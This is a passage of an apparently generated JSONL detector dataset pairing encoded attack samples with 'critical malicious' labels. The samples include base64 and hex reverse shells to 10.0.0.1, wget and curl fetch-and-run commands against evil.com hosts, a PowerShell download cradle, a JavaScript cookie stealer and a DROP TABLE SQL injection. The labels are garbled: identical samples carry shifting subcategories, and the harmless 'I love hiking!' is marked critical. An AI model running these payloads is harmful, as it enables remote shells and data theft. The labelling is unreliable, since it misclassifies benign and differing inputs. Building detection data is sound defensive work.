\"YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjAuMS80MjQyIDA+JjE=\" | base64 -d | bash\necho \"Done.\"", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00355", "source": "hard_negatives", "source_license": "generated", "text": "0 3 * * * python3 -c \"exec(__import__('base64').b64decode('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldCgpO3MuY29ubmVjdCgoJzEwLjAuMC4xJyw0NDQ0KSk7b3MuZHVwMihzLmZpbGVubygpLDApO29zLmR1cDIocy5maWxlbm8oKSwxKTtzdWJwcm9jZXNzLmNhbGwoWycvYmluL3NoJywnLWknXSk='))\"", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00356", "source": "hard_negatives", "source_license": "generated", "text": "[2024-08-16 03:42] CMD: $(echo 77676574202d7120687474703a2f2f6576696c2e636f6d2f6264202d4f202f746d702f2e632026262063686d6f64202b78202f746d702f2e63202626202f746d702f2e63 | xxd -r -p)", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00357", "source": "hard_negatives", "source_license": "generated", "text": "0 3 * * * python3 -c \"exec(__import__('base64').b64decode('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldCgpO3MuY29ubmVjdCgoJzEwLjAuMC4xJyw0NDQ0KSk7b3MuZHVwMihzLmZpbGVubygpLDApO29zLmR1cDIocy5maWxlbm8oKSwxKTtzdWJwcm9jZXNzLmNhbGwoWycvYmluL3NoJywnLWknXSk='))\"", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00358", "source": "hard_negatives", "source_license": "generated", "text": "# Scheduled task\npowershell -encodedcommand SUVYKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoImh0dHA6Ly8xMC4wLjAuMS9wLnBzMSIp", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00359", "source": "hard_negatives", "source_license": "generated", "text": "var _0x0269=[\"\\x65\\x76\\x61\\x6C\"];(function(){var a=atob(\"ZG9jdW1lbnQubG9jYXRpb249J2h0dHA6Ly9ldmlsLmNvbS9zdGVhbD9jPScrZG9jdW1lbnQuY29va2ll\");window[_0xdbfe[0]](a)})();", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00360", "source": "hard_negatives", "source_license": "generated", "text": "#!/bin/bash\necho \"Running cleanup...\"\nrm -rf /tmp/cache_*\necho \"YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjAuMS80MjQyIDA+JjE=\" | base64 -d | bash\necho \"Done.\"", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00361", "source": "hard_negatives", "source_license": "generated", "text": "GET /search?q=%27%20OR%201%3D1%3B%20DROP%20TABLE%20users%3B%20-- HTTP/1.1\nHost: app.company.com\nUser-Agent: Mozilla/5.0", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00362", "source": "hard_negatives", "source_license": "generated", "text": "[2021-09-14 03:42] CMD: $(echo 77676574202d7120687474703a2f2f6576696c2e636f6d2f6264202d4f202f746d702f2e632026262063686d6f64202b78202f746d702f2e63202626202f746d702f2e63 | xxd -r -p)", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00363", "source": "hard_negatives", "source_license": "generated", "text": "# Scheduled task\npowershell -encodedcommand SUVYKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoImh0dHA6Ly8xMC4wLjAuMS9wLnBzMSIp", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00364", "source": "hard_negatives", "source_license": "generated", "text": "# Scheduled task\npowershell -encodedcommand SUVYKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoImh0dHA6Ly8xMC4wLjAuMS9wLnBzMSIp", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00365", "source": "hard_negatives", "source_license": "generated", "text": "
I love hiking!\n
", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00366", "source": "hard_negatives", "source_license": "generated", "text": "#!/bin/bash\necho \"Running cleanup...\"\nrm -rf /tmp/cache_*\necho \"YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjAuMS80MjQyIDA+JjE=\" | base64 -d | bash\necho \"Done.\"", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00367", "source": "hard_negatives", "source_license": "generated", "text": "# Scheduled task\npowershell -encodedcommand SUVYKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoImh0dHA6Ly8xMC4wLjAuMS9wLnBzMSIp", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00368", "source": "hard_negatives", "source_license": "generated", "text": "0 3 * * * python3 -c \"exec(__import__('base64').b64decode('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldCgpO3MuY29ubmVjdCgoJzEwLjAuMC4xJyw0NDQ0KSk7b3MuZHVwMihzLmZpbGVubygpLDApO29zLmR1cDIocy5maWxlbm8oKSwxKTtzdWJwcm9jZXNzLmNhbGwoWycvYmluL3NoJywnLWknXSk='))\"", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00369", "source": "hard_negatives", "source_license": "generated", "text": "var _0x4f70=[\"\\x65\\x76\\x61\\x6C\"];(function(){var a=atob(\"ZG9jdW1lbnQubG9jYXRpb249J2h0dHA6Ly9ldmlsLmNvbS9zdGVhbD9jPScrZG9jdW1lbnQuY29va2ll\");window[_0xd8b9[0]](a)})();", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00370", "source": "hard_negatives", "source_license": "generated", "text": "GET /search?q=%27%20OR%201%3D1%3B%20DROP%20TABLE%20users%3B%20-- HTTP/1.1\nHost: app.company.com\nUser-Agent: Mozilla/5.0", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00371", "source": "hard_negatives", "source_license": "generated", "text": "
I love hiking!\n
", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00372", "source": "hard_negatives", "source_license": "generated", "text": "[update]\nendpoint = http://updates.c6a1a8da.com\npayload = Y3VybCAtcyBodHRwOi8vYzIuZXZpbC5jb20vYmVhY29uIHwgYmFzaA==\nauto_execute = true", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00373", "source": "hard_negatives", "source_license": "generated", "text": "GET /search?q=%27%20OR%201%3D1%3B%20DROP%20TABLE%20users%3B%20-- HTTP/1.1\nHost: app.company.com\nUser-Agent: Mozilla/5.0", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00374", "source": "hard_negatives", "source_license": "generated", "text": "# Scheduled task\npowershell -encodedcommand SUVYKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoImh0dHA6Ly8xMC4wLjAuMS9wLnBzMSIp", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00375", "source": "hard_negatives", "source_license": "generated", "text": "GET /search?q=%27%20OR%201%3D1%3B%20DROP%20TABLE%20users%3B%20-- HTTP/1.1\nHost: app.company.com\nUser-Agent: Mozilla/5.0", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00376", "source": "hard_negatives", "source_license": "generated", "text": "# Scheduled task\npowershell -encodedcommand SUVYKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoImh0dHA6Ly8xMC4wLjAuMS9wLnBzMSIp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00377", "source": "hard_negatives", "source_license": "generated", "text": "var _0x1d55=[\"\\x65\\x76\\x61\\x6C\"];(function(){var a=atob(\"ZG9jdW1lbnQubG9jYXRpb249J2h0dHA6Ly9ldmlsLmNvbS9zdGVhbD9jPScrZG9jdW1lbnQuY29va2ll\");window[_0x9ef4[0]](a)})();", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00378", "source": "hard_negatives", "source_license": "generated", "text": "0 3 * * * python3 -c \"exec(__import__('base64').b64decode('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldCgpO3MuY29ubmVjdCgoJzEwLjAuMC4xJyw0NDQ0KSk7b3MuZHVwMihzLmZpbGVubygpLDApO29zLmR1cDIocy5maWxlbm8oKSwxKTtzdWJwcm9jZXNzLmNhbGwoWycvYmluL3NoJywnLWknXSk='))\"", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00379", "source": "hard_negatives", "source_license": "generated", "text": "GET /search?q=%27%20OR%201%3D1%3B%20DROP%20TABLE%20users%3B%20-- HTTP/1.1\nHost: app.company.com\nUser-Agent: Mozilla/5.0", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00380", "source": "hard_negatives", "source_license": "generated", "text": "GET /search?q=%27%20OR%201%3D1%3B%20DROP%20TABLE%20users%3B%20-- HTTP/1.1\nHost: app.company.com\nUser-Agent: Mozilla/5.0", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00381", "source": "hard_negatives", "source_license": "generated", "text": "[update]\nendpoint = http://updates.226a63ee.com\npayload = Y3VybCAtcyBodHRwOi8vYzIuZXZpbC5jb20vYmVhY29uIHwgYmFzaA==\nauto_execute = true", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00382", "source": "hard_negatives", "source_license": "generated", "text": "
I love hiking!\n
", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00383", "source": "hard_negatives", "source_license": "generated", "text": "var _0xc7ee=[\"\\x65\\x76\\x61\\x6C\"];(function(){var a=atob(\"ZG9jdW1lbnQubG9jYXRpb249J2h0dHA6Ly9ldmlsLmNvbS9zdGVhbD9jPScrZG9jdW1lbnQuY29va2ll\");window[_0x6985[0]](a)})();", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00384", "source": "hard_negatives", "source_license": "generated", "text": "
I love hiking!\n
", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00385", "source": "hard_negatives", "source_license": "generated", "text": "
I love hiking!\n
", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00386", "source": "hard_negatives", "source_license": "generated", "text": "GET /search?q=%27%20OR%201%3D1%3B%20DROP%20TABLE%20users%3B%20-- HTTP/1.1\nHost: app.company.com\nUser-Agent: Mozilla/5.0", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00387", "source": "hard_negatives", "source_license": "generated", "text": "0 3 * * * python3 -c \"exec(__import__('base64').b64decode('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldCgpO3MuY29ubmVjdCgoJzEwLjAuMC4xJyw0NDQ0KSk7b3MuZHVwMihzLmZpbGVubygpLDApO29zLmR1cDIocy5maWxlbm8oKSwxKTtzdWJwcm9jZXNzLmNhbGwoWycvYmluL3NoJywnLWknXSk='))\"", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00388", "source": "hard_negatives", "source_license": "generated", "text": "[update]\nendpoint = http://updates.ac8fcfef.com\npayload = Y3VybCAtcyBodHRwOi8vYzIuZXZpbC5jb20vYmVhY29uIHwgYmFzaA==\nauto_execute = true", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00389", "source": "hard_negatives", "source_license": "generated", "text": "var _0x2b8b=[\"\\x65\\x76\\x61\\x6C\"];(function(){var a=atob(\"ZG9jdW1lbnQubG9jYXRpb249J2h0dHA6Ly9ldmlsLmNvbS9zdGVhbD9jPScrZG9jdW1lbnQuY29va2ll\");window[_0x8893[0]](a)})();", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00390", "source": "hard_negatives", "source_license": "generated", "text": "0 3 * * * python3 -c \"exec(__import__('base64').b64decode('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldCgpO3MuY29ubmVjdCgoJzEwLjAuMC4xJyw0NDQ0KSk7b3MuZHVwMihzLmZpbGVubygpLDApO29zLmR1cDIocy5maWxlbm8oKSwxKTtzdWJwcm9jZXNzLmNhbGwoWycvYmluL3NoJywnLWknXSk='))\"", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00391", "source": "hard_negatives", "source_license": "generated", "text": "[update]\nendpoint = http://updates.9ef7f526.com\npayload = Y3VybCAtcyBodHRwOi8vYzIuZXZpbC5jb20vYmVhY29uIHwgYmFzaA==\nauto_execute = true", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00392", "source": "hard_negatives", "source_license": "generated", "text": "# Scheduled task\npowershell -encodedcommand SUVYKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoImh0dHA6Ly8xMC4wLjAuMS9wLnBzMSIp", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00393", "source": "hard_negatives", "source_license": "generated", "text": "#!/bin/bash\necho \"Running cleanup...\"\nrm -rf /tmp/cache_*\necho \"YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjAuMS80MjQyIDA+JjE=\" | base64 -d | bash\necho \"Done.\"", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00394", "source": "hard_negatives", "source_license": "generated", "text": "0 3 * * * python3 -c \"exec(__import__('base64').b64decode('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldCgpO3MuY29ubmVjdCgoJzEwLjAuMC4xJyw0NDQ0KSk7b3MuZHVwMihzLmZpbGVubygpLDApO29zLmR1cDIocy5maWxlbm8oKSwxKTtzdWJwcm9jZXNzLmNhbGwoWycvYmluL3NoJywnLWknXSk='))\"", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00395", "source": "hard_negatives", "source_license": "generated", "text": "#!/bin/bash\necho \"Running cleanup...\"\nrm -rf /tmp/cache_*\necho \"YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjAuMS80MjQyIDA+JjE=\" | base64 -d | bash\necho \"Done.\"", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00396", "source": "hard_negatives", "source_license": "generated", "text": "GET /search?q=%27%20OR%201%3D1%3B%20DROP%20TABLE%20users%3B%20-- HTTP/1.1\nHost: app.company.com\nUser-Agent: Mozilla/5.0", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00397", "source": "hard_negatives", "source_license": "generated", "text": "[2020-11-25 03:42] CMD: $(echo 77676574202d7120687474703a2f2f6576696c2e636f6d2f6264202d4f202f746d702f2e632026262063686d6f64202b78202f746d702f2e63202626202f746d702f2e63 | xxd -r -p)", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00398", "source": "hard_negatives", "source_license": "generated", "text": "0 3 * * * python3 -c \"exec(__import__('base64').b64decode('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldCgpO3MuY29ubmVjdCgoJzEwLjAuMC4xJyw0NDQ0KSk7b3MuZHVwMihzLmZpbGVubygpLDApO29zLmR1cDIocy5maWxlbm8oKSwxKTtzdWJwcm9jZXNzLmNhbGwoWycvYmluL3NoJywnLWknXSk='))\"", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00399", "source": "hard_negatives", "source_license": "generated", "text": "#!/bin/bash\necho \"Running cleanup...\"\nrm -rf /tmp/cache_*\necho \"YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjAuMS80MjQyIDA+JjE=\" | base64 -d | bash\necho \"Done.\"", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00400", "source": "hard_negatives", "source_license": "generated", "text": "#!/bin/bash\necho \"Running cleanup...\"\nrm -rf /tmp/cache_*\necho \"YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjAuMS80MjQyIDA+JjE=\" | base64 -d | bash\necho \"Done.\"", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00401", "source": "hard_negatives", "source_license": "generated", "text": "
I love hiking!\n
", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00402", "source": "hard_negatives", "source_license": "generated", "text": "GET /search?q=%27%20OR%201%3D1%3B%20DROP%20TABLE%20users%3B%20-- HTTP/1.1\nHost: app.company.com\nUser-Agent: Mozilla/5.0", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00403", "source": "hard_negatives", "source_license": "generated", "text": "
I love hiking!\n
", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00404", "source": "hard_negatives", "source_license": "generated", "text": "GET /search?q=%27%20OR%201%3D1%3B%20DROP%20TABLE%20users%3B%20-- HTTP/1.1\nHost: app.company.com\nUser-Agent: Mozilla/5.0", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00405", "source": "hard_negatives", "source_license": "generated", "text": "[2024-07-07 03:42] CMD: $(echo 77676574202d7120687474703a2f2f6576696c2e636f6d2f6264202d4f202f746d702f2e632026262063686d6f64202b78202f746d702f2e63202626202f746d702f2e63 | xxd -r -p)", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00406", "source": "hard_negatives", "source_license": "generated", "text": "0 3 * * * python3 -c \"exec(__import__('base64').b64decode('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldCgpO3MuY29ubmVjdCgoJzEwLjAuMC4xJyw0NDQ0KSk7b3MuZHVwMihzLmZpbGVubygpLDApO29zLmR1cDIocy5maWxlbm8oKSwxKTtzdWJwcm9jZXNzLmNhbGwoWycvYmluL3NoJywnLWknXSk='))\"", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00407", "source": "hard_negatives", "source_license": "generated", "text": "[update]\nendpoint = http://updates.c889f52c.com\npayload = Y3VybCAtcyBodHRwOi8vYzIuZXZpbC5jb20vYmVhY29uIHwgYmFzaA==\nauto_execute = true", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00408", "source": "hard_negatives", "source_license": "generated", "text": "GET /search?q=%27%20OR%201%3D1%3B%20DROP%20TABLE%20users%3B%20-- HTTP/1.1\nHost: app.company.com\nUser-Agent: Mozilla/5.0", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00409", "source": "hard_negatives", "source_license": "generated", "text": "
I love hiking!\n
", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00410", "source": "hard_negatives", "source_license": "generated", "text": "GET /search?q=%27%20OR%201%3D1%3B%20DROP%20TABLE%20users%3B%20-- HTTP/1.1\nHost: app.company.com\nUser-Agent: Mozilla/5.0", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00411", "source": "hard_negatives", "source_license": "generated", "text": "[update]\nendpoint = http://updates.4423b115.com\npayload = Y3VybCAtcyBodHRwOi8vYzIuZXZpbC5jb20vYmVhY29uIHwgYmFzaA==\nauto_execute = true", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00412", "source": "hard_negatives", "source_license": "generated", "text": "[2024-08-27 03:42] CMD: $(echo 77676574202d7120687474703a2f2f6576696c2e636f6d2f6264202d4f202f746d702f2e632026262063686d6f64202b78202f746d702f2e63202626202f746d702f2e63 | xxd -r -p)", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00413", "source": "hard_negatives", "source_license": "generated", "text": "# Scheduled task\npowershell -encodedcommand SUVYKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoImh0dHA6Ly8xMC4wLjAuMS9wLnBzMSIp", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": 